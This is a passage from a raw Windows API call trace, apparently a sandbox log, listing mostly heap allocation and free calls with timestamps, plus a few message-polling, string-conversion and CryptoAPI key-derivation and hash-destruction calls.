(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0255.796] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87090, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0255.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0255.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0255.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0255.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0255.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0255.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0255.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0255.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0255.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0255.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0255.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0255.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0255.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0255.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0255.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0255.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0255.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0255.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0255.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0255.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0255.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0255.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0255.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.800] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0255.801] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0255.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699c8 [0255.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0255.801] CryptDestroyHash (hHash=0xa87090) returned 1 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0255.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0255.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0255.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0255.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0255.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0255.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0255.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0255.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0255.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0255.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0255.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0255.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0255.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0255.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0255.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0255.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 